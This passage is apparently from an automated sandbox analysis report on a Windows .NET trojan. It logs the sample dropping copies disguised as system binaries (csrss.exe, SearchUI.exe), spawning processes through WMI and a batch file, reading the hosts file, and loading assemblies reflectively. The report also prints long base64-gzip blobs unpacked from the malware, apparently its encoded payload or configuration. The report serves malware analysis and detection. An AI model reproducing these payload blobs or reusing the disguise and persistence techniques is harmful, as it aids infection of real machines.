                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess created: C:\Recovery\JRFdtWyAvbQxLlvO.exe "C:\Recovery\JRFdtWyAvbQxLlvO.exe" userJump to behavior
                    Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exeProcess created: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe" user
                    Source: C:\Recovery\csrss.exeProcess created: C:\Recovery\csrss.exe "C:\Recovery\csrss.exe" user
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.logJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeFile created: C:\Users\user\AppData\Local\Temp\fVdHfbHE4fJump to behavior
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@55/25@14/3
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.12.unpack, I1y/u00357j.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.12.unpack, I1y/u00357j.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.6.unpack, I1y/u00357j.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.6.unpack, I1y/u00357j.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Recovery\csrss.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Recovery\csrss.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\System Volume Information\Chkdsk\SearchUI.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Recovery\csrss.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.12.unpack, Ola/n17.csBase64 encoded string: 'H4sIAAAAAAAEAF3STXOCMBAG4B/kRdpprUelRJMqSoBt5Oa3QSi26FD99U3kzUzbAzN52M3uBtKnh3XNyuyZ+3Io/ImOHteHLODnQSyuNMrqfilvQmU3IqGrnEchRbqJs9v3+6I85Xz+zwk78pr7q5o+VjZ/nHWj+7sgn2lOZHs05n0SHv/sG4tA/nYomZzaeQbjsArHspTeuqnKJTuprWQku0xtznuSKVGyE14UCD3TsG40v/dmAdl1X/iqw31lzqgqszbzqRw+wjvR+gpXiKfwGX6CB8jX8B7xC7xFvIaPiC/gLziGO8iX8As8hw/IT+AerOALLOBPOINPcA4X8JWjH+y786D/CC4RJ7iGmXHPfvuoSF+Hhfn38U43xcQ8M914U90wuxatadGaELd3x5q5/LRde7PWxQYxhXzEibdmS+TDFKPeAvUkjP6MUG+H+pjHe4NXqO/y3fxz1HP7kU8Z6kfYH8LIL9y8yGeo77nzoB5z/d38OE+B8zHMS2Yeb2vvdmrufCKu2x+3F7mQwAMAAA==', 'H4sIAAAAAAAEALPUcPbNzFdQjtdw9smMr7Ex9dWOTNCI18rUUFAp9jPy9XeriSzRVFBTU9RUcdAw8vVWTIiK1KipU9NQsFEtCIu3VHWJsy63qyuN00u2VsxN1tSw01Iw1YkqtUyo0yyx0yqyrPRx0PVIUVXMVXZQzvRVpos9OkB7KrUAl8gOK9wAAAA='
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.12.unpack, u003315/B9B.csBase64 encoded string: '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
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.6.unpack, Ola/n17.csBase64 encoded string: 'H4sIAAAAAAAEAF3STXOCMBAG4B/kRdpprUelRJMqSoBt5Oa3QSi26FD99U3kzUzbAzN52M3uBtKnh3XNyuyZ+3Io/ImOHteHLODnQSyuNMrqfilvQmU3IqGrnEchRbqJs9v3+6I85Xz+zwk78pr7q5o+VjZ/nHWj+7sgn2lOZHs05n0SHv/sG4tA/nYomZzaeQbjsArHspTeuqnKJTuprWQku0xtznuSKVGyE14UCD3TsG40v/dmAdl1X/iqw31lzqgqszbzqRw+wjvR+gpXiKfwGX6CB8jX8B7xC7xFvIaPiC/gLziGO8iX8As8hw/IT+AerOALLOBPOINPcA4X8JWjH+y786D/CC4RJ7iGmXHPfvuoSF+Hhfn38U43xcQ8M914U90wuxatadGaELd3x5q5/LRde7PWxQYxhXzEibdmS+TDFKPeAvUkjP6MUG+H+pjHe4NXqO/y3fxz1HP7kU8Z6kfYH8LIL9y8yGeo77nzoB5z/d38OE+B8zHMS2Yeb2vvdmrufCKu2x+3F7mQwAMAAA==', 'H4sIAAAAAAAEALPUcPbNzFdQjtdw9smMr7Ex9dWOTNCI18rUUFAp9jPy9XeriSzRVFBTU9RUcdAw8vVWTIiK1KipU9NQsFEtCIu3VHWJsy63qyuN00u2VsxN1tSw01Iw1YkqtUyo0yyx0yqyrPRx0PVIUVXMVXZQzvRVpos9OkB7KrUAl8gOK9wAAAA='
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.6.unpack, u003315/B9B.csBase64 encoded string: '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
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:416:120:WilError_01
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeMutant created: \Sessions\1\BaseNamedObjects\2fd94bc2444112714c2cdb84d50ce23dbd13ec1d
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3844:120:WilError_01
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\PQCfAXDYbo.bat"
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.12.unpack, u003867/r79.csCryptographic APIs: 'TransformBlock'
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.12.unpack, u003867/r79.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.12.unpack, u003867/r79.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.6.unpack, u003867/r79.csCryptographic APIs: 'TransformBlock'
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.6.unpack, u003867/r79.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.6.unpack, u003867/r79.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Recovery\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Recovery\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: Binary string: protobuf-net.pdbSHA256 source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.559121813.0000000003D82000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.558911567.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.553950891.0000000001210000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.559121813.0000000003D82000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.558911567.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.553950891.0000000001210000.00000004.08000000.00040000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: Yara matchFile source: 2.2.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.fa0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.3cb9d30.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.3c59510.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.554390785.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.552452554.0000000000FA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.558911567.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe PID: 3496, type: MEMORYSTR
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, Atsthjjfumvdxjgbafdfm/SchemaValueWriter.cs.Net Code: ViewStrategy System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.9f0000.0.unpack, Atsthjjfumvdxjgbafdfm/SchemaValueWriter.cs.Net Code: ViewStrategy System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.9f0000.0.unpack, Atsthjjfumvdxjgbafdfm/SchemaValueWriter.cs.Net Code: ViewStrategy System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: qwevqjeiqvj.exe.2.dr, Atsthjjfumvdxjgbafdfm/SchemaValueWriter.cs.Net Code: ViewStrategy System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 2.2.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.940000.0.unpack, Atsthjjfumvdxjgbafdfm/SchemaValueWriter.cs.Net Code: ViewStrategy System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 2.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.940000.0.unpack, Atsthjjfumvdxjgbafdfm/SchemaValueWriter.cs.Net Code: ViewStrategy System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: ShellExperienceHost.exe.8.dr, Atsthjjfumvdxjgbafdfm/SchemaValueWriter.cs.Net Code: ViewStrategy System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: fontdrvhost.exe.8.dr, Atsthjjfumvdxjgbafdfm/SchemaValueWriter.cs.Net Code: ViewStrategy System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: fontdrvhost.exe0.8.dr, Atsthjjfumvdxjgbafdfm/SchemaValueWriter.cs.Net Code: ViewStrategy System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: JRFdtWyAvbQxLlvO.exe.8.dr, Atsthjjfumvdxjgbafdfm/SchemaValueWriter.cs.Net Code: ViewStrategy System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: csrss.exe.8.dr, Atsthjjfumvdxjgbafdfm/SchemaValueWriter.cs.Net Code: ViewStrategy System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: SearchUI.exe.8.dr, Atsthjjfumvdxjgbafdfm/SchemaValueWriter.cs.Net Code: ViewStrategy System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.f50000.3.unpack, Atsthjjfumvdxjgbafdfm/SchemaValueWriter.cs.Net Code: ViewStrategy System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.f50000.7.unpack, Atsthjjfumvdxjgbafdfm/SchemaValueWriter.cs.Net Code: ViewStrategy System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.f50000.13.unpack, Atsthjjfumvdxjgbafdfm/SchemaValueWriter.cs.Net Code: ViewStrategy System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.f50000.5.unpack, Atsthjjfumvdxjgbafdfm/SchemaValueWriter.cs.Net Code: ViewStrategy System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
